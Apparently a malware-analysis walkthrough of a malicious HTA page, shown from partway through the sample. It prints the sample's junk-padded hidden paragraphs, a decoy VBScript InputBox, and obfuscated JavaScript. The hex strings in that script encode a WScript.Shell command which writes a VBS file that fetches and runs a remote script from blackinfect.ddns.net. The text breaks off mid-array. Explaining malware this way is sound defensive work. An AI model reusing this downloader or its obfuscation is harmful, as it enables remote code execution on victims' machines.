oTdMINvUlWbL7wXbgGM2cDTJj8wh8zP61PlfBb1upDWjGDivcAztxCG0h1ATcpTCFkNQCgxOMC8SBSWDeJNpFFaMNH4PDP6wYvZueoqELOx9mr8e6txT1vhMr4HlSAk1TvisNk88zgtsnl6BkD1fv8FQyXr1gKbSAAinQjfTHjxZDUDHIROMzgz9dtSq8juNDudTwb1fSpTmUlLr2boCkfGpPwiCxnokxAOU7FMxjloyGquefalfx7fGt6h4Q1L7BfV7wJuLGAZdrAlPZmN98EpsJC6nxiP3QKeBancRdJcCumLFGm0JutFI0FMD2rWzfsUTGy9wWPDE3w4HNw2CZ4G0gUGO1OxfNDaFrWLztJ3bytuNUHcXGuQuAI7jiLRgevutJLZAaiD33WN2RwDGSBJN0SLA3wPTOJkOCzjTuNbvLUZVwLw7xVttJvgOWRxLzcreejuWRBOjxWUS04ExIFIrQuxizEbRS2VrJwpdflEo0lSqdGbmncx1Z9CqXGalF4wH78sDBwe3iVzwHL9MwG3ymhKeg5ec2ULfbfswWkzKWK9Q3ZhH2Ttn6MpXUDeD9d98tIajyL70j0t39AOQ4kqZj0uPiZMnhwPAsIOUGsoHLvBNSknY3aHBdAA4ShgSfmTunu5wDRVWRkRd5817FUd2GxkurtGAYo4QnLe4m23Td97rdETB2a1kmpKwmnZJzimgQgmzxe1XTB0aTzNG2fC2ZmMgDSVyM9EzHZkKEaFV6ZDBAaL1PR9GLkodzGAuijopAAvUY4Sd8W2klCtabpx8dubVFeG2OTOAY7f0iTFd3f1srTpu1XrPY8mFH3cQagJ6tizRDT3pEofg6LwPNkdyU5GHLKYN3urkdDzU3AWvH52bax85QRqDUxUfynti9qF5v2WYmLntdqg3L0mXhSL9VQEnZddrHUazwJ7vWroijbb4lIOjaYyOHPDDzhoSR8kXX8qDVhT7TKeMmuvI1EfbO4HGItoXBslDxYwiwHJSKcuCwIJTa29</p> 

<p class="hidden">kdKoeawFw2LgVwHB2THNdWLm2CdooOtfTpp7fIJBOfyLx44T6xveELuRK8zqJKrkpM7PupkTDG1UzmKWujTNOzKBMgrVjMJmdBz3O37GSNsjg33K54uUL0dcyQXB7NKgpCUvrfjZEsoQt9vQbTf9OlRJJqykJY5A7AVkWamVtEvKQjv6hhnZsKx4jjWRousO4VkLZgBLNODMMTHyNGDMSHviE62kPhEcc1Bq5r6o7UXAkroig4wyyjQxXTKx0TGxM2xGDoLl3XEE5fEavySIFuRYEEYyJ3RICaJONuqlV5tQbbaxOOGRuXkilPIJsowNZ3qDE6Oc51</p> 

<p class="hidden">DyrV37yvzZPJepvskBnndjwsDvzFJ79HqUmThc2JhIckPUKp8WI0A78RZnrx9yI3cwy9oAfSEQTUcQxoUUS5a91EyilT3FPYx9sdu4rH5MKDZYHIbViZW6YI3Ri5O4H8QJGTRD0ez74huWYQE7z2zuOhp0LgA00hC5XhXUPzsWCX0KgUEqCjDWx4E8M6w4SPvvVsyTp4nr7QTIuymqcahHt7yIUe3B8P36NTw4fnn7IHmODeCjL3RzDsFkGFgByZYxPeM9B0yunIu4nclZXosT8Jivz63lPtbx7BXsItg8uG2zf8Vqkro1CcbNjvd7FRsYwLjGkpJDH1Hn8eoYqH0CYrcbUWgr27HSRoe5WsvNZ9P1mBXqDmllRKFhKNDVI9CKF5hGULOlxnmjRUHWwF7cveXE0ltRv5Q8KNiKWb5N4HcFVP4g2H8ZkU0bGtS48z3fMoUoSqL426gsImYbvI1Y5vKp6dumIiLlhGXumWlp53HAhxfALv1EIY9aBdKNGq6kwybRZ4cP5VYyLPrL7lH9eNhepcKF91OgLN5Xkmg6TIQkyiZq8VjgFdw1raAmYyYdYsRUEtQGQa8qvn0SYvJeanU6L2Qfv6WJBqFcHGH01c3IHtsu6wwOiz9KvqK5MFCOFH7UcPgu6Twwq5Cz59enpSo0j6Y2NzE9MnWLM8leCVUcyaIKiZcWJBtnp6R5KTv97P62bfbXAUAneIbc3hFFRcsnS0QgKAocJhoyZH6M5f3qnIhmSLZWKnBS0COMe8nG6MdJyBs1RtRIl2NwAjqmdlpC78FPpSTTdFoybBZi1ODOFHwVf6ZBo8s0CIbTSikNc8jIH3G6Txi4HWMFVWqsq9YJ68vrVIEaMV3OTXKcFryFY8OqhohGRkyR9IkpMoNpFykdZlS9QjjT9rMjZvl32QymhYzRMsqgpICVHlqkxIifg8wcWLvyyMh4mgQD5AUCI0XYAniDJpEqNvijemBI6x5aS1hVGA9AjrZo4k7AE51cGRoKTdgu47jkEzlu1aXIHcTvLmYt3icGziBtsQTGevjIddpWBYVVoFnrBTf1bIn3Zgf0qK0ud1NlzFPrN0OhEN054UmFKe4pCzS9KKQlPXBlSpxI2g28cV3376xxiaeTLvTqJtczWZKuEmp0Y9F8P6YR7X0muV9GNsJ45MiDE0bnJA9qAOpTFUz8sqoEcKKwdDiBBres7iqgTkWA0cmLfrbVPWrsEGPGDBmzlv9sYMOsl3On6yi1F4w8zWqTDbAXJnC7jYk9Ri1SmrgTwCv21QYsVqVwPct6Q74vBAuNOTWpEiTErt0hXFnSomkU5eqWUuJyppAYK5FOJJwlDUBjz3iO6X9te0YBQJcX6gjCLwvHFilITrrNtbNEMPZ1iXnno6oHJSOQJ9zwhVWY7WdbrSecxUJtXZbvuBjJXstJzDVWmp64nYmcV7396iI8NLIcSuWfybnSzwE3EJAooXGSCevA38AW6IxN8WPGBQhuDfDdIZcbNz89x8c05QGrrNSYiw14CWmg8Wamv5d5iQgjAgeuzxJ9c8z8ftX9YDUhDhKnGt32fNleC3bJnWLLwYGTcqv1qe2CCfdc4r7SbmxzG2EEINOE2645bTbXqCB9CYIqEZvdU1Z0cOns3JwTXhPA23NyS0n9qxLdRT3p5AdP5zKvD83JVtbbf5kZI7PkEuUTbdKCx7UfOMsHcgUaYZ9BehcinQ0DvMzy19DwouK6A3Y9tbV7EytTV0aSOv4C8MHf7HE5JdwQxFZ8fHwV5ET1m66MWrGdfA0yb5Qog27Te225abxEzmeDv0XNgem3k7DHqXd7cJpJraQCKxrpPyjGPLZ7glKj4rvJE6ssqqtYbalShS2GRf8CSfuXAvjANMkoNNaaAc1iNA6lXf89ABtrvaLWRRnyqmTbQ2dO0P28</p> 

<p class="hidden">yNzgyioXzrQxcKCqX3rRrmgFbOVYSHSFjcWVtGy2aT8Ecle2v2DdTtvDlTQOlFDSjuW8pOiSYsSr8c4A9OE9KrFXs2hT2DZC0pTOOuQq3o5oTDOIDG8OXPEQJMeP0yrmSfEi1F58EY3zmJUZahk3muiqyDbsXHSBvUzabFLusnXYihKdmzF5DfCdmQyNQ7zAudRwrR9yygwzoLbbeTwKT4p2PBeHB6PTrhwvLfXh0gYPVRKLP7xnTSApIVFY380Z4RcQxOxzQyjLTOUVMK1J8H9IDbvhHjiXWZGPcPUgvpG6M0SyijnYF5YAqvTMwg0wUMwu0OgaaEuOS8jMRJjYsHSIpAJ0yUu8eB8xqejryfe6PebagSa3A6chVgvkiviY4gdCgx7ZWPJmzsvvmmh9RTVKUftPn6LWCrlKrSZr8sYLzGefM2rRQlBlqkEbBTwPcDQnGRNh666nCVJ2kzaD6OFxKnhqZchTn9zgZBFUn3tE1sSlFvvgWWPEa2NoZfZPX9c8vU8ZHGAZuY1loQ6gNQo4QWskFC70NeAtXW8bIVdWCbVtDdE1EmNP7FTwcg5F8whiGcu8V32VV0ha8piYcW7XuZf1ckqiGqhWRV47SOQRmaJlZepJTebtmYLh2S19htfCmzFB7PirO9CYpnwTAeOMNo1Ql2i3ziBosE03clEuOMvW5A5b0wg6dNe0mA5XCjsJVjcjNSHc3izdF1Jz8LIWHxEeGNPncadWk0WAIeUgEOeyDoFXdLnsYObSTmKaZlVfFKTsqX9tbAjEKBGGjbETd9Sy1xJOqIbBPthllUkwbQEN7BbAW8QunQZyMGYYxxzf2vtXLrO7UNhJl0UEdGRKcJ9gpJSJHfUnZUALLHf3dp9SfIZSzueddmd9gAgGv2N9sH43mC9udW7hEnJ188nfxw60siNdpEQsCUlflIlknFMF5MGN61wugfIFxj41yxY5zOdzRwlg5qj4bQrXpu6Q2gA9WjJ3Tz4sOWEoNuL1eDSMos56vAwfMr0FHnwq79mYHLSS6i8F5RkadBvVaUCVKR7cjJsgqMk7Jo2UgoefwhJiEsqH495veGgqocOJtTdELjqnikUMZYdVoghsUFsACa33RQswmGgNKH87BE7BGbH0qlUD8icC3QRRq4QSl7j8Jt0NgTOZwAjEgvVPl5dxLxLNrXrxXPE4FKwfd8sF2msk7qyMMfa5tGyDOZq8PAG6gknfHM9hZH2w6HjRZHJrqXV49cVOYGVmU3xIqEbGZBG38HnSXClHUGACsTDH7c2wrsti35XiobphgafXQ4fGkmsrGVeiB0llPVcmlFVeJjHiG79WmLwpjpvCgOlbxgxjmErZMcWpFKhoMvfFFgCHlgZxT9drVCUeXgIAq2wRbWnqF8koccUw6ph9QWMwOJLwDDkMaPoMu0RfanFXp3SOkkLzNop7o3mHlGqGfcE83Q01XsZPim2l7fT94fLge1MWbqRHk9CPp8KnbCAEq5j9N3V5FX29TeFfNIe08rtsWmq4fwEIr1nrKjeif4uB5DN6bUpmvPj8Icpz75p8Lt8WhL2kXtA5LZoqs2pjHryc3yEi6IEfOWXB78pLUfnhFRx4gMrVgoKyez5s474</p> 

<p class="hidden">UJFvYgzteUNDdxhtzlC2bPNKqZeyFsJM2HjsXejsypKlk6J1271IIOTBCGTMsUSvLW1u3bIiQxYhUNP2q4QuULMKijVRjjyqpPUCaZ0XCeOiKkWPzExk3TCt7RySnEafEiOHDh6n6xgE7F1xz7XynPlBHBv3Q4FUFmp2QRNqBtJ4un1wQUVApaeg5dsD7bapIwTpuNgywy4MOuB6kPyzjZ4cVHpnV3h3vDNbNJBM8QHoeZc3HOmkglIxcddxmhStYu2LnRRepM53mtp47MaQcYuwKOYWeRIthbViX8g7L1uICO0fwM3nluDYkS7Qnv9M7NRtKULzuzotwC2msSPiNoGeLmCHDCxQJcBjTRbBUG0bFlZnpdJVUvm7cy8yHfsKtCT2nv4lAebMGFiYsr8TpA0Nec4jbtoLTwaVeePwXMSuRkEi2yRpYLnKiv15T586o3aqYdwGZQbQTKokoWzvsdemPneiV7qQXj83sjB2jyUC8iOaDBZWvt6KupFj4ciQlfB0GdrJnBHoahJAJsQ1NMXiYBZaGaRDT0SBffN74gn5TY8CuH0ZJwgnz6zcCIfuzON9zWO20uLZjCCrzzlx2eTyXZ4yPrmZk9z2H1gJ5NwY119RaqeNWnTWvLgiEz6BibOIMTBrTbNRiXmXilK0JQhHfnbJ3pqBq5p4L8zQIu5uDOCk1rFyUJoQkS0yLDe3Nq3kIHzC7CRUIGH1mlzVD4q1RGtCBrCWyAFvr0G41sOT64wPlBV1hqcdwW8idIwhQERXkfwws7bo7z6irNG91UwjYjLrq620sJCvvlVMAEgiEqszkAiajyFu2RZOQbeJXwt3zCDHFgyZPhm73CfF5DIw95azSJbHSOdpHk1dUTAsyEFYV2GHZfujiJYEcDGZqwtbaK5NXderY1R39NWNqNdxRsKmuTfhdBXXq9dQGd8BYw4GffVC24WZcnaYOVhIewtHFoUlIQWrS9dPb0AYuiibZ3d4RFsxWBUUV5FGfpQ95HLwr6G2z7ELvPYmtBG1RjRnPdTC38zZdKwjse7QiiEGfDbalrKqTp1AUK0Wdn0QwJ7mm66tN3Ds4rYHLeYV7SNq0EVA5OUMUD6oOFp5v4qUKCmNLqhpteXw8e3CItOeoPkzycb5vkzKFjC9NX49QUDIw8yFnPzXG1Jq3P8dpTFXpN4z2adLeEIMrO8xc168O2I5OGONs54exYMiksEZ9fRVG81yLbLu6R1oDgTO44KDJ9yf8bSQTxpLPpFGIWQh1UrWAAi5r0z3tROOkO9bCg4tDUB6VvfIu0D5lmJ7Q00aDvqd656</p> 

<p class="hidden">tOQWuVYiQSpT7cHCqYHMohnEa1bRifCYVPZWQdytiZ3C1MNAYxEdZh8OKFfbsXEDcUnenn5zUufIXDqIgBWQLUiBixMNqIMlRQAie2vb4Bj1bjQU4MLLNzV8s3cw87lC3OGoXfWC6kMhKcGh8Zc3iKE1bWV0FOxYDPooChyi5jCRMrEJSqDeinkwFfZuKHtMRp9JLNXBMYewVdfcBA5kxyi9n24dVmYyR1kwtSscpxxkkkaDUdXJBR7Eggii0JCNBLWjrbovzW26yXGISEnWj5Fvq0XJsy6wO0XgYiecEExg51R0svX2rTJGJkYUtUWgn3GeGmDV9Um6FtY1IZajm8bvzpvRq50spKxJmQ1JzNrlkUwDKYTnaeuW7KAo8xPIVL6bK5f5OTAdAVqSBgAtPkQvnzEwvzO6HMxta48</p> 

<p class="hidden">HZ8yU8coPhA8mObsNiIAVcPWdC2p9XlOBJBlUlMIygO6pyc2JHZk4YT6XEDxnsoos2FY9zmhGJttuQmXJ9PG0aP78zDzrz9tKcV9EjkemmnuMpxQ9BFipnVq3xlMC1dK6OqRYti64nsptQRrFHh1PrbDR5GLyQwpIpgfDcKm6p5DhJ0Yhr5vprEH9PE33SKrinXYH9llVOZBwWzkw5vy33h2PJdIXoHfh49oh5eA5jYsUG9sW5NHzSUz8xdpgDhlK7dsnkRTcPtSC9RbGgGQej9OtgTuITJ1fY9ayA0mkyjR5goBi99dhfC75U5LHtvsR3b0losBVWvYjI6hm6R7U0rbXPZO12NpcdxFtPhg9KnynaMwz5jnBaR8L8UFzjDNXREQIr4vJOwvWURwwUGzjTv1HydRyEjFxH69SfI3E1AlFhRSmLIb3yRCLiHCyUSy66JRdrrj0d5JVo4h2Dgi0tCWcu2AvHTVPPEPwQIl0kxpExSpJVEvqhhGA3vL9npihJr7zxxcA0gqlt1XpQl2GOQ2SzLKeNMbHgGBQ7F9OQqrO57ycLSP6KpYqxIp8cyAcV04rmc4HVXJSyLVyFIh7cdbiQ6cy6muZglK9tv1LaQ9I7a2ku8TNIiFGLx9p77fwg00syNC2EPptpmUflrF0oGVbpSHPxhUvDcTE0YPuXIqulEsWVDPwerInSOjREL2xCT7vMzyq5Ex9A9HbaszLVzwMaFX8O5kSFkkU9WEBa43U5NuPBoCbsriCWrMS3yDeJKxYyZw8yRcjygafxXUbJaTfl9UuXWWbKvno2zzP2TRikR8PdgfWfSNmOXCfwUU7m0w9vwmZS17qyE3hcMSotODrRViovY6L7SlGMvtxqSECmOfNJzKf2vVvGPpd2gGuMEJscB55uRTpOTYdUE4l0LJHKqEXraRSFUBr3lD88gGCHciRnmts3MUsidqGpF8tj4rVmJfwWl8GyckrilAaLnnnludAJ9ZOUVkAdXOzFXPx2bl5080dMuOCsmU3g08HzFiunAZ1Sl47G2NutjVLsMlsbB9GVOGYqkqxQuRthN371ifWbidHKDbNVp0n2xKgWYbIX3XFTCURemifAGoCvo0pRtDrJz9aGxAqCbsXCUh6PhCd6DS3lar4vXfhbuZmFWW3T7jPq9dm0fi5JzPIL6yazpylmhxYVUGBgAxF0A5WW4HKbtYWdRSGUiWi8NuLEmMYIOp9Ofw4MzKIO6cdWkfzfSZK7CS41YN9Nu74lvavZbPbmMO5BDBDfCxrGyuCbZAB7tOBsdDXQM1i6WMR4hGYezrK64UvitJvmLSmY9SxMS1AorOaVC4ZsgoFA1v302RWnYCtonB6yRIs2l3vhVDzqrdacohV43NxWA3d8mEb2yKcMkOF4R4FsM4u3mIr3H3g0R55NiKGNw2Gn6BmQGMZkqxrynyTpDYEnYLcn3pAjriFC4BIS1cjD9wdedLlsc3jDfwYnII3exEflHF4iYTsWxskDneOSZmeEdREGCPEfrcBonXm26jv7ERlSWvZajWdSGHyiCwGPi1Gq6qaqWYIkwSrNdQa5qZsjW4ExXtsSPLSBrboWDVtUqdmJ4gs4hDqpyYtmHru6YJEHYd8MxYfmnmqzCdmH976ElrRUVdjyZ21Lk6Y314swlXaSHSeaIcvShyHdUiBkSJDrAuHUjvXr5qWLeaEbn3stcEecOTqo8hcvHiGpMDVpD1nDpfchP89QJQCwrBJjvqo6mJO9osEF4cbVWYOHiLaBRhTHGA1Zhoa1SJi5IzBKAtwnVdIEsIdx165fTnlzvvA5ua4Lls1x4OA4R23hp5Uf235Ca3RDDyYBW2XCwzBEq5UbsV4F6hy6PRgHS7GcT2Op3mKuz9S0ZgbuOHQA83c5M5WaWtXEUExp0Q5EnwGcmwGEAJNtV8oFNLU6QwNNVZJ1RjrBOb6DZA81</p> 

<p class="hidden">jyexviX768lchFGyTmiQotsRDSQDzH2cMGseRP9fwYYuHyUTaNGVtGr8Cvci7xkiaTQ4UVsWZozGAY9olZSHu0uQP07sEdSW9HuWGMg7ZUURi9QiK4ZSyYeltJ1nugquR4qjMiICGku5tYxm40QnstCeUdCDTCmfS2EbNytLY4brpIGpon0qDX8aEooFAHp71dLlD0kjgTsBkOjrC6GudkO1nvbrT4DBNkyLDBqrrT0PsmieozgrR62qIubELhOUyOuA9Blq8WS8sLSdAa9LItyHwVhDfk05ihboEVKaCo9hY9ct5WP0ZrYolg8u8vFfV0Tv8JFH1fBPK9idLPYCWi8YnPjyzjh2EDdLcc1Xv2aEVLCol4R0wOxyHrv6PF8u4JpjuXpogTGRSAjuKcdPk5MM86UCl7XHWINZ4FrbHWz79YoZ8lSyqRX4Ovq8sPOmi9cQSax9fWTh9BGpwYrgzP8RRlftDo4iHcoELlYxNiR9TkGOx0eyywwXZFGEmwzHhRK0lcXvs7dNFpnC7ysuz9ZgZUHMwAwFUD6QI9p5CDCoettLP29GcrFAj3AK5ge3b7b6Yf37PpkQLtBqvtT2JCLipsLQZeAcx8fdpzLXMLUWMS7I9N2UXzjZyQlE6yHHmaRAcoSQpbDEXJfSOLS9FXmTDwmfpASUUjq1yqrZcx3dQZTkg8JPGvClLwzueGv0Ak57NFfWZaNc7q4lxr9aHOfAvfJ8UCu5xCczSPYhi13ViGMnpb5Hxi3T3wBdPuvAPxhrn1uK2YLuU6shDWT0RZTjz0PnZA9ZbPQEgIyZe66nONsrv7iGWr7Fj6eRDKWD0iGe6Ho0XfPgDBQKTmQVDhusuErl54ZCpC0aS7QkHLEiC7adKu4rMwSBhx2DQKX3OlZKb8j0fkn32</p> 

<p class="hidden">pyy2vvqkpjTsJQzstDpjoUfAj9K5IzWtN6lFZM9pWMf5DNNd2JBfa6veA4bSSxRmouxEUfLC12I2GQgDr1iSWrKg4FLjRVRk6KnklBNLESzFlGF1b7tW8Bud28L2WMaBaHyU6w00KXCDI3vvS2PVMdUZahAYXVoIaH3DaYecxYANYnHG3RbfdJtdKzoVupxDyjyKMIrAekOdpA0INyeRyAleY2nRaKXdbwlF3i627FK2RY7SXKTGwmIm8RCGQYhDYFSdPxGbzcTVWZORiXX7zYzL2PImwVnMNMAQJfoJCVDLlWp8qP8GkGSuWKCqb8eGuHDqkWyudlwTgbxUuBt47bkyr6KRqiv25fE6CS7RdPQ9SKMIPJynzl9l1FKxc8aHrjst73k5d83c8QcIbqwDkc9gEd5qvtAvGEbjgi8YOn9N4pTWGJXn1omrdqbFxTFsk7XdF3LgCDqEzxUZjNCbh20AiBcqzkDl45Km2J7zc719JKPz0XPfsMTXVXNoeUXRtFhX80RWpYFcsY19kTaifwoVpzWGmRsaaEo5Yb3uAsNziVKc6a6qzeMBjqJd1B1QZR6XG1w04Jh5ABfFMx2gGCX602ENY7KAxu5lyWbHTiGUHv4xtEPB32axi2Ip443G3eopOxA77wrCHLEkUuwmppGvtZAxFjdXfazqFTttryKMzdiqwFnDXVNGW0hDrDTGf9aUWIz6hrdNNABx8WFhluRlKofLIbYdhHhnuvNWHEv9b9flDBsWTaAHjoHeGWWqrATN8F1PD9m4m3K0OT5Db82WKHTkLHiu6jAzbRlQ7noBHgnjSXGV5lXaEPtnoU3e8vjIKNw2wEG9OLnbZbOxT1KBhqz80wmqdNE8R6sFhPPhy5C2KixOK3WEWgkQydKxgDmYmmRoJnvZLvujY8zI8MfXAT52OQBWJ8zXmgeylw91J5wsXfEFIctA9KLChLt9wldtUe68gA485e1lAYF6B1YseprcJRX5ltthyJhs8m4AfX5fkoFOzNXy72zdbf2wjQUjcMnucJ29NJxXGzt0HQl7WzCn3ajy443nrp05c9QH0ndL7NOPtdOaZ6CGqEw6FZnGLJNZncjWyxy3fVfVhUx0JUwLJkAkwwR3TsHPiLj93G7FFUmgM30VNPgxE1HQtyDYYRBpYT8PedRzOgdSmWmn8zikUNQvqNwi8Kjj4YoTjVoTiBxa9JAQUnr4nR4sykS1ab4Kdu5pj3KPAIXyJOFX7ORXgQIxysqp7FEXNAqVQjcCU8ZR1ccue25HJhOsZA36gxWm1kd9NwrSiJX9CW988YHEhQYfxz6WiKj0ZPbLOmywMcKsK4AFB4bHL2ErgDTJQWws9Dgs4hlMBwpHUJ1Vn8ZKBNqB2w1XrSXmBTMvQ0XteucUbvsYjKGDy1PqJ3IZsTegmnNk7sJk7hRnNZHEC5wZCKzKERLibMR5qq5ZA1g5VBSN33TNJrJQjIHhOTHapgseyGgHTYVFN8EU1iZUOYTLja0nyMAy8BeljIC4jyzSJDqbzgg0V7PsPRuo4SjzdvQzIrDUiXXhmpsT6iNLnQQCGzi4WN9ob0swv3wNxCywiSDoJjrT2PNSxbAigxq8shJ2HTiAZMJKhxBid4EFniAOmDMKmScZ89qY0vA6c9uCXkufRuMCCAobeGxuqKg8xEDycDzkGVWE15kpbCSQCeDxN33b7slTzSFoxzDOOdexaXpkwnHzrT7Q8POdV0Dkd14yrgLVKiMfsB8cdaN3IKlkmEsYOWZcz6c0QjBluFR99UCinCIixhtKDRVsRaxFZHPimh2KXPgvFeT4ZGXyL39m8LWRgvRW0KIJ1iHM36GvOkfJW2ILAJV0h6KuOOFJeQHbAKGOMV6oq0PbAa9rCrqL7qziFReTnvgOeDccHRXREsLiOCXdkntXFLEeHOHsQOmo65LLQXmyoJYQXFO0x5xXnsziYG9WJmNezwbDuzCWM1UXJtglv6fpEqb0e1ge69</p> 



</body>
</html>

At the beginning we have to standard HTML tags that define the name of the page, the language and the application name. If we scroll down a bit we see the opening of the script code.

First we have a block with VBScript code

</script>

<!-- Establishes the language of this scripting block -->
  <script language="VBScript">

//Asks a question in Spanish in an InputBox
//The question translates to: what is the results of 9 + 3?
a = InputBox("¿Cuál es la suma de 9 + 3?","Resuelve la pregunta","Respuesta")


    Sub RjrF80()
        msgbox("Error (cod JdtIcnOoxJ32)")
        close
    End Sub
</script>

This block creates an InputBox that will ask the user a question. This code does not seem to contain anything interesting.

<script type="text/javascript">

window.moveTo(3162, 3581);

function Vw3eX8X29(){
    var _$_N7nuQ8464=["\x40\x40\x62\x40\x40\x6C\x40\x61\x40\x40\x63\x40\x40\x40\x40\x6B\x40\x69\x40\x40\x6E\x40\x66\x40\x65\x40\x40\x63\x40\x74\x40\x40\x40\x40\x2E\x40\x64\x40\x40\x64\x40\x40\x6E\x40\x40\x73\x2E\x40\x40\x40\x6E\x40\x40\x40\x65\x40\x74",
        "\x40\x57\x40\x40\x53\x40\x40\x40\x63\x40\x40\x40\x72\x40\x40\x69\x40\x40\x40\x70\x40\x40\x40\x74\x40\x2E\x40\x53\x40\x40\x68\x40\x40\x65\x40\x40\x40\x40\x6C\x40\x40\x40\x6C",
        "\x40\x40\x40\x72\x40\x40\x40\x75\x40\x40\x6E",
        "\x40\x40\x40\x40\x63\x40\x40\x40\x6D\x40\x40\x64\x40\x40\x40\x20\x40\x2F\x40\x40\x40\x56\x40\x2F\x40\x40\x44\x40\x2F\x40\x40\x40\x63\x40\x20\x65\x40\x63\x40\x68\x40\x6F\x40\x7C\x40\x40\x40\x73\x40\x40\x40\x65\x40\x40\x74\x40\x40\x40\x20\x40\x40\x40\x2F\x40\x40\x70\x40\x40\x40\x3D\x40\x40\x5E\x40\x40\x40\x40\x22\x40\x41\x40\x40\x6D\x40\x40\x40\x68\x40\x40\x63\x40\x40\x40\x70\x40\x40\x52\x40\x40\x36\x40\x31\x3D\x40\x22\x40\x2E\x40\x40\x40\x40\x22\x40\x3A\x40\x40\x67\x40\x40\x4B\x40\x40\x46\x40\x40\x50\x40\x30\x40\x33\x40\x40\x39\x40\x40\x3D\x40\x40\x40\x40\x22\x40\x40\x69\x22\x40\x40\x3A\x40\x4D\x40\x59\x40\x40\x40\x55\x40\x40\x6E\x40\x40\x4F\x40\x40\x6B\x40\x39\x40\x36\x40\x3D\x40\x40\x22\x40\x40\x67\x40\x40\x40\x40\x22\x40\x40\x3A\x40\x40\x47\x40\x40\x6C\x40\x40\x76\x40\x40\x38\x40\x40\x30\x40\x3D\x40\x40\x40\x40\x22\x40\x3A\x40\x22\x40\x40\x3A\x40\x40\x47\x40\x40\x40\x65\x40\x40\x74\x40\x4F\x40\x5E\x40\x40\x40\x22\x40\x3E\x40\x40\x40\x25\x40\x40\x70\x40\x40\x40\x75\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x40\x25\x40\x40\x5C\x5C\x40\x40\x40\x53\x4B\x40\x40\x7A\x40\x40\x40\x34\x40\x38\x40\x33\x40\x36\x2E\x40\x40\x40\x76\x40\x40\x62\x40\x73\x40\x40\x40\x26\x40\x65\x40\x40\x40\x63\x40\x40\x40\x40\x68\x40\x40\x40\x40\x6F\x40\x40\x7C\x40\x40\x40\x73\x40\x40\x40\x40\x65\x40\x40\x40\x74\x40\x40\x20\x2F\x40\x40\x70\x40\x40\x40\x3D\x40\x40\x40\x40\x5E\x40\x40\x22\x40\x40\x62\x40\x40\x40\x6A\x40\x40\x40\x65\x63\x40\x40\x74\x40\x40\x28\x40\x40\x40\x22\x73\x40\x40\x43\x40\x40\x72\x40\x40\x22\x40\x40\x40\x2B\x40\x40\x67\x40\x4B\x40\x46\x40\x40\x40\x50\x40\x40\x40\x30\x40\x40\x33\x40\x40\x40\x39\x40\x40\x2B\x40\x22\x40\x40\x40\x70\x40\x74\x40\x40\x22\x40\x2B\x40\x40\x47\x40\x40\x40\x6C\x40\x40\x40\x76\x40\x40\x38\x30\x40\x40\x40\x2B\x40\x40\x22\x40\x68\x54\x40\x22\x40\x2B\x40\x40\x22\x54\x40\x70\x40\x40\x40\x40\x73\x40\x22\x40\x40\x40\x40\x2B\x40\x47\x40\x40\x40\x40\x6C\x40\x40\x76\x40\x40\x38\x40\x30\x40\x2B\x40\x22\x2F\x40\x40\x40\x2F\x40\x62\x40\x6C\x61\x40\x40\x63\x6B\x40\x40\x69\x40\x6E\x40\x40\x66\x40\x65\x40\x40\x63\x40\x40\x40\x74\x40\x40\x40\x22\x40\x40\x2B\x40\x40\x41\x40\x40\x40\x6D\x40\x40\x40\x40\x68\x40\x63\x40\x70\x40\x52\x40\x40\x36\x40\x40\x40\x31\x40\x40\x40\x40\x2B\x40\x40\x40\x22\x40\x64\x40\x40\x64\x40\x40\x40\x6E\x73\x40\x40\x22\x40\x40\x2B\x40\x40\x40\x41\x40\x40\x40\x6D\x40\x40\x68\x40\x63\x40\x40\x40\x70\x40\x40\x52\x40\x40\x36\x40\x40\x40\x31\x40\x40\x40\x40\x2B\x40\x22\x40\x6E\x40\x40\x40\x65\x40\x74\x40\x40\x40\x2F\x40\x40\x40\x2F\x40\x22\x40\x40\x2B\x40\x40\x40\x4D\x40\x59\x40\x55\x40\x40\x40\x6E\x40\x40\x40\x40\x4F\x40\x40\x6B\x40\x39\x40\x40\x40\x40\x36\x40\x2B\x40\x22\x40\x40\x31\x40\x22\x40\x40\x29\x40\x40\x40\x5E\x40\x22\x40\x40\x3E\x40\x40\x3E\x40\x40\x40\x25\x40\x70\x40\x40\x75\x40\x40\x40\x62\x40\x6C\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x25\x40\x40\x40\x5C\x40\x40\x40\x40\x5C\x40\x40\x40\x53\x40\x4B\x40\x40\x7A\x40\x40\x34\x40\x38\x40\x40\x40\x33\x40\x40\x40\x40\x36\x40\x40\x2E\x40\x76\x40\x40\x40\x62\x40\x40\x73\x40\x40\x26\x40\x40\x63\x40\x40\x40\x40\x3A\x40\x40\x5C\x40\x40\x5C\x40\x40\x77\x40\x69\x40\x6E\x40\x40\x64\x40\x40\x40\x6F\x40\x40\x77\x40\x40\x73\x40\x5C\x40\x5C\x40\x40\x73\x40\x40\x79\x40\x40\x73\x40\x40\x40\x40\x74\x40\x40\x40\x40\x65\x40\x40\x40\x6D\x40\x40\x40\x40\x33\x40\x32\x5C\x40\x40\x5C\x40\x40\x40\x63\x40\x6D\x40\x64\x40\x2E\x40\x65\x40\x40\x78\x65\x40\x20\x40\x2F\x40\x63\x40\x40\x20\x40\x40\x73\x40\x74\x40\x61\x40\x40\x72\x40\x40\x74\x40\x40\x20\x40\x43\x40\x3A\x40\x40\x5C\x40\x5C\x40\x55\x40\x40\x40\x73\x40\x40\x40\x65\x40\x40\x40\x72\x40\x73\x40\x40\x5C\x40\x40\x5C\x40\x50\x40\x40\x75\x40\x40\x62\x40\x40\x6C\x40\x40\x40\x69\x40\x40\x63\x40\x40\x40\x5C\x40\x40\x5C\x40\x40\x53\x40\x40\x4B\x40\x7A\x40\x40\x34\x40\x40\x38\x40\x40\x33\x40\x40\x40\x36\x40\x2E\x40\x40\x40\x76\x40\x62\x40\x73",
        "\x40\x40\x40\x50\x40\x6F\x40\x40\x70\x40\x40\x75\x40\x40\x40\x70",
        "\x40\x40\x40\x45\x40\x72\x40\x72\x40\x6F\x40\x40\x72\x20\x40\x40\x28\x40\x40\x63\x40\x40\x6F\x40\x40\x64\x40\x40\x40\x20\x40\x25\x40\x40\x73\x40\x40\x40\x72\x40\x61\x40\x40\x6E\x40\x40\x64\x40\x40\x40\x25\x40\x40\x29",
